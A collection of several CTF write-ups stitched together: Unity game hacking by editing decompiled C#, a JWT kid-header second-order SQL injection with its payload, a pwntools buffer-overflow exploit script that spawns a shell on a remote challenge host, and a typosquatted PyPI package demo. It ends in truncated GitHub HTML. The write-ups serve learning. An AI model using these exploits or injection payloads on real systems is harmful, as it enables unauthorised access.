// Token: 0x06000029 RID: 41 RVA: 0x00002AC4 File Offset: 0x00000CC4 private void FixedUpdate() { float axisRaw = Input.GetAxisRaw("Horizontal"); float axisRaw2 = Input.GetAxisRaw("Vertical"); this.o(new Vector3(axisRaw, axisRaw2, 0f)); //here is the important bit }}```In the decompiled version of **player** class, movement is implemented with `Input.GetAxisRaw` and passed as a 3d vector to the `Mover.o` function.```C# this.o(new Vector3(axisRaw * 0x30, axisRaw2 * 0x30, 0f)); //here is the important bit```Multiplying the values was the most straightforward way to implement a speedhack, so that's exactly how I did it.
Compile, save, load the game...
And here we go!
_some extraordinairly long hallway travelling later..._
Ah, these are the promised monsters.
Judging by the third npc's line,and this:
and even this:
... we gotta stop the monsters from following the player, so that they arrange themselves and give us the first flag.
## Defeating the beasts
Monster logic in this game is not too complicated.
```C#using System;using UnityEngine;
// Token: 0x02000006 RID: 6public class Enemy : Mover{ // Token: 0x0600000B RID: 11 RVA: 0x00002264 File Offset: 0x00000464 protected override void Start() { base.Start(); this.x = GameManager.instance.player.transform; this.y = base.transform.position; this.z = this.x.GetChild(0).GetComponent<BoxCollider2D>(); }
// Token: 0x0600000C RID: 12 RVA: 0x000022B4 File Offset: 0x000004B4 private void FixedUpdate() { if (Vector3.Distance(this.x.position, this.y) < this.chaseLenght) { this.v = (Vector3.Distance(this.x.position, this.y) < this.triggerLenght); if (this.v) { if (!this.w) { this.o((this.x.position - base.transform.position).normalized); } } else { this.o(this.y - base.transform.position); } } else { this.o(this.y - base.transform.position); this.v = false; } this.w = false; this.bn.OverlapCollider(this.filter, this.ba); for (int i = 0; i < this.ba.Length; i++) { if (!(this.ba[i] == null)) { if (this.ba[i].tag == "Fighter" && this.ba[i].name == "Player") { this.w = true; } this.ba[i] = null; } } }
// Token: 0x0400000B RID: 11 public int xpValue = 1;
// Token: 0x0400000C RID: 12 public float triggerLenght = 1f;
// Token: 0x0400000D RID: 13 public float chaseLenght = 5f;
// Token: 0x0400000E RID: 14 private bool v;
// Token: 0x0400000F RID: 15 private bool w;
// Token: 0x04000010 RID: 16 private Transform x;
// Token: 0x04000011 RID: 17 private Vector3 y;
// Token: 0x04000012 RID: 18 public ContactFilter2D filter;
// Token: 0x04000013 RID: 19 private BoxCollider2D z;
// Token: 0x04000014 RID: 20 private Collider2D[] ba = new Collider2D[10];}```
`this.o` object is from the _Mover_ class.
```C#protected virtual void o(Vector3 a) { this.bo = new Vector3(a.x * this.br, a.y * this.bq, 0f); if (this.bo.x > 0f) { base.transform.localScale = Vector3.one; } else if (this.bo.x < 0f) { base.transform.localScale = new Vector3(-1f, 1f, 1f); } this.bp = Physics2D.BoxCast(base.transform.position, this.bn.size, 0f, new Vector2(0f, this.bo.y), Mathf.Abs(this.bo.y * Time.deltaTime), LayerMask.GetMask(new string[] { "Actor", "Blocking" })); if (this.bp.collider == null) { base.transform.Translate(0f, this.bo.y * Time.deltaTime, 0f); } this.bp = Physics2D.BoxCast(base.transform.position, this.bn.size, 0f, new Vector2(this.bo.x, 0f), Mathf.Abs(this.bo.x * Time.deltaTime), LayerMask.GetMask(new string[] { "Actor", "Blocking" })); if (this.bp.collider == null) { base.transform.Translate(this.bo.x * Time.deltaTime, 0f, 0f); } }```
It just transforms the entity position, according to the vector, passed to it, as an argument.So, to stop the monsters from moving, it is sufficient to just remove the calls to this object.
```C# private void FixedUpdate() { if (Vector3.Distance(this.x.position, this.y) < this.chaseLenght) { this.v = (Vector3.Distance(this.x.position, this.y) < this.triggerLenght); if (this.v) { if (!this.w) { // remove this this.o((this.x.position - base.transform.position).normalized); } } else { // and this this.o(this.y - base.transform.position); } } else { // and finally, this this.o(this.y - base.transform.position); this.v = false; } this.w = false; this.bn.OverlapCollider(this.filter, this.ba); for (int i = 0; i < this.ba.Length; i++) { if (!(this.ba[i] == null)) { if (this.ba[i].tag == "Fighter" && this.ba[i].name == "Player") { this.w = true; } this.ba[i] = null; } } }```
That's it! The monsters should no longer be able to move.Let's try it out.
nite{Eb1c_9aM3R} sure looks like a flag to me!
## The second part of the challenge
### Welcome Adventurer! There is a portal that teleports you to other levels but unfortunately only wizards can use it. Can you figure out how to make the portal work and get to the hidden level "level0"?
Let's look at the portal code.
```C#using System;using UnityEngine;using UnityEngine.SceneManagement;
// Token: 0x0200000F RID: 15public class Portal : Collidable{ // Token: 0x0600002B RID: 43 RVA: 0x00002B01 File Offset: 0x00000D01 protected override void b(Collider2D a) { if (a.name == "Wizard") { GameManager.instance.SaveState(); SceneManager.LoadScene(this.sceneNames[Random.Range(2, this.sceneNames.Length)]); } }
// Token: 0x04000031 RID: 49 public string[] sceneNames;}```
That check is rather trivial to overcome.I edited the player class to change the value of _name_ to "Wizard".
```C# protected override void Start() { base.Start(); Object.DontDestroyOnLoad(base.gameObject); this.name = "Wizard"; //change the name to pass the check }```
Not only did this break the npc interactions, it also teleported me to some useless place!One hell of a wizard I am...
Fortunately, the portal code is not complicated. It just loads a "random" scene starting from the index 2 in the scene pool.```C# GameManager.instance.SaveState(); SceneManager.LoadScene(this.sceneNames[Random.Range(2, this.sceneNames.Length)]);```At this point, I remembered poking around the game files and seeing some strings.This one in particular:`Ah you found the hidden level. But unfortunately you spawned in the wrong place. `It belongs to the _level1_ file, which is a scene file in unity.That means, all we have to do to get there is this:```C#using System;using UnityEngine;using UnityEngine.SceneManagement;
// Token: 0x0200000F RID: 15public class Portal : Collidable{ // Token: 0x0600002B RID: 43 RVA: 0x00002B01 File Offset: 0x00000D01 protected override void b(Collider2D a) { // remove the check for convenience if (a.name == "Wizard") { GameManager.instance.SaveState(); SceneManager.LoadScene(this.sceneNames[1]); } }
// Token: 0x04000031 RID: 49 public string[] sceneNames;}```
I also changed the _name_ variable back and got rid of my speedhack to make it more playable.
"Spawned in the wrong place", huh...
## The spawning thing
From this point, I spent a couple of hours just tinkering around with the game files.I thought, that I needed to spawn on the hidden level to get the flag and tried to achieve this in various ways. No matter, how I did it, I was always getting the same "spawned in the wrong place" message. I took a short break and realised one possibility: **there is spawn logic in the GameManager class, so there might be respawn logic**.Feeling like a total idiot, I went back to the files and found this:
```C# public void l() { this.player.transform.position = GameObject.Find("RespawnPoint").transform.position; }```
**...bruh**
## The fancy respawn button
It was time to finish this challenge. However, just landing at the secret level and respawning sounded way too boring, so I decided to make a special control for this.
I modified the _FixedUpdate_ function of the _Player_ class in this way:```C# private void FixedUpdate() { if (Input.GetKey("w")) //if w is pressed { GameManager.instance.l(); //respawn } float axisRaw = Input.GetAxisRaw("Horizontal"); float axisRaw2 = Input.GetAxisRaw("Vertical"); this.o(new Vector3(axisRaw * 1f, axisRaw2 * 1f, 0f)); }```
Our final flag: nite{L3vel_100_Maf1a_b055}
## Conclusion
And this is it for the Lost Dungeon! Fantastic entry-level game hacking challenge, in my opinion.This was (obviously) my first challenge of that kind and I had a lot of fun with it.
**Thanks for reading, stay sharp, and keep pwning <3** |
We are presented with a page with some menu hyperlinks. The only ones that take us to different pages are the register and login, where we are allowed to create an account and login in with that account.
After a successful login, if we look into the page source code there is a hyperlink tag that is commented out.
If we try to access the admin page, we are presented with a **Forbidden**. Looking more carefully around there is also an image that does not load, but has some base64 content.
```html```
Decoding the content, the result is **Second fallen order**. This will be useful. A new cookie is also given, **token**, that store a jwt.
Looking at the headers of the jwt provided, there is the kid parameter, an optional header claim which holds a key identifier, that corresponds to the username that we provided when registering an account. Looking for vulnerabilities in jwt, more specifically in the kid parameter, <https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens#kid-issues>. Hmm, this looks interesting, there is a SQL injection issue, and with the hint **Second fallen order** we can assume that there is a [Second order SQLi](https://infosecwriteups.com/the-wrath-of-second-order-sql-injection-c9338a51c6d) vulnerability, also the challenge description has the **'union'** word in it. Let's create a new account, and in the username we are going to insert an SQLi payload, `' UNION SELECT 'key` and see if we can control the key used to sign/verify the jwt.
Visiting the **admin** page an _Internal server error_ occurs, so we must be on the right track. Since we control the key now, we just need to forge a jwt where the **admin** claim is defined as true.
Now we just need to use this jwt and access the **admin** page. |
For this challenge a file is provided, **jump_to_win**, and we can spawn an individual docker instance.
We can also use [_checksec_](https://docs.pwntools.com/en/stable/commandline.html?highlight=checksec#pwn-checksec) to see what protections are enabled in the binary.
The ASLR is enabled, which means the addresses are randomized, and can make our file harder.
The file is an ELF, not stripped each will make our life much easier in order to understand how the binary behaves. In order to get more details about it, lets use [Ghidra](https://ghidra-sre.org/), that will decompile the binary.
After running Ghidra we can see now that the binary starts executing the main, then if the **flag** variable is different than 0 it will call the jump function, and if the same variable has a specific value, **0x4155**, the jump function will call vuln that will execute the **/bin/sh** command. The jump function is also leaking the vuln function address, so we don't need to worry about the ASLR.
Both inputs are vulnerable to buffer overflow, because of the [gets](https://linux.die.net/man/3/gets) function, it will read input until it finds a **EOF**, since the variable to where it will write has a defined size, 32, and if we send more that 32 characters we will start writing over stuff in the stack.
First lets try to send an input that will change the flag variable and with that call the jump function. Sending 65 "A"s will change the flag value, but not to the correct one. We can send the hex value after the offset needed, 64, or we can send the characters **UA** that will result in the same value.
Now we can access the second input, we just need to send an offset big enough that will reach the position immediately behind the RBP, and since we have the vuln address we just need to write it after the offset. To discover the offsets needed I used [GEF](https://gef.readthedocs.io/en/master/). Using pwntools a possible solution would be:
```python# https://docs.pwntools.com/en/stable/from pwn import *
p = remote('ctf-metared-2021.ua.pt', 25677)
p.recvuntil(b' == Your username: \n')
first_payload = b'A' * 64 + b'UA'p.sendline(first_payload)
p.recvline()tmp = p.recvline()vuln_address = tmp.decode().split(':')[1].strip().replace('\n', '')second_payload = b'A' * 40 + p64(int(vuln_address, 0))
p.sendline(second_payload)p.interactive()p.close()
``` |
The pacman.py is a simple Pacman game made with python, which uses functions in the utils.py file and requires pip packages included in the requirements.txt.
Actually, it does not require all the packages included in the requirements.txt file. The majority of the requirements are useless and their only purpose is to offuscate the names of the packages that are actually used, more specifically the package "tutle", which is a typosquatting of the original Python package "Turtle". "tutle" was intentionally uploaded to pypi.org (the Python Package Index repository) by us, which does everything that "Turtle" does, plus something else.
Once you install "tutle" through pip and pacman.py uses it, you're running potentially malicious code without knowing, because we can upload whatever we want to PyPi :).
The tutle.py file used by the "tutle" package includes somewhere between two functions the following code:
```import tempfiletemp = tempfile.NamedTemporaryFile(mode='wb', buffering=0)temp.write(bytes.fromhex('43544655417b30485f4e6f215f705950495f48696a41636b217d'))```
This code writes the flag to a file inside your temporary files folder (in UNIX, /tmp), while pacman.py is running. So when you were running the game trying to find the flag, it was written in that folder and accessible by you all along :).
This is harmless, but any block of code can be run in this situation, so pay attention to the pip packages that you install! |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTF-Writeups/X-MAS_CTF_2021/Underground Forensics at main · K1nd4SUS/CTF-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="DF80:8CC1:155A3B23:15FA09FC:64121C4E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="3ac98d6e69eb99e9f8c11213b3a20491d7de8082da0771bf7bcd8b7fb68837a6" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJERjgwOjhDQzE6MTU1QTNCMjM6MTVGQTA5RkM6NjQxMjFDNEUiLCJ2aXNpdG9yX2lkIjoiMjIzOTE1NDQxODAzMjQ1MDYzOCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="4b897007c4e88e8d674dffb3053ef2f97d407c48801c8748edc3e24439f35828" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:352459850" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="CTF Writeups. Contribute to K1nd4SUS/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/b2f906a035b0951006ca72c61eeea46b7183aa8339c276e2c7f91f7d5317b725/K1nd4SUS/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/X-MAS_CTF_2021/Underground Forensics at main · K1nd4SUS/CTF-Writeups" /><meta name="twitter:description" content="CTF Writeups. Contribute to K1nd4SUS/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/b2f906a035b0951006ca72c61eeea46b7183aa8339c276e2c7f91f7d5317b725/K1nd4SUS/CTF-Writeups" /><meta property="og:image:alt" content="CTF Writeups. Contribute to K1nd4SUS/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/X-MAS_CTF_2021/Underground Forensics at main · K1nd4SUS/CTF-Writeups" /><meta property="og:url" content="https://github.com/K1nd4SUS/CTF-Writeups" /><meta property="og:description" content="CTF Writeups. Contribute to K1nd4SUS/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/K1nd4SUS/CTF-Writeups git https://github.com/K1nd4SUS/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="81649886" /><meta name="octolytics-dimension-user_login" content="K1nd4SUS" /><meta name="octolytics-dimension-repository_id" content="352459850" /><meta name="octolytics-dimension-repository_nwo" content="K1nd4SUS/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="352459850" /><meta name="octolytics-dimension-repository_network_root_nwo" content="K1nd4SUS/CTF-Writeups" />
<link rel="canonical" href="https://github.com/K1nd4SUS/CTF-Writeups/tree/main/X-MAS_CTF_2021/Underground%20Forensics" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
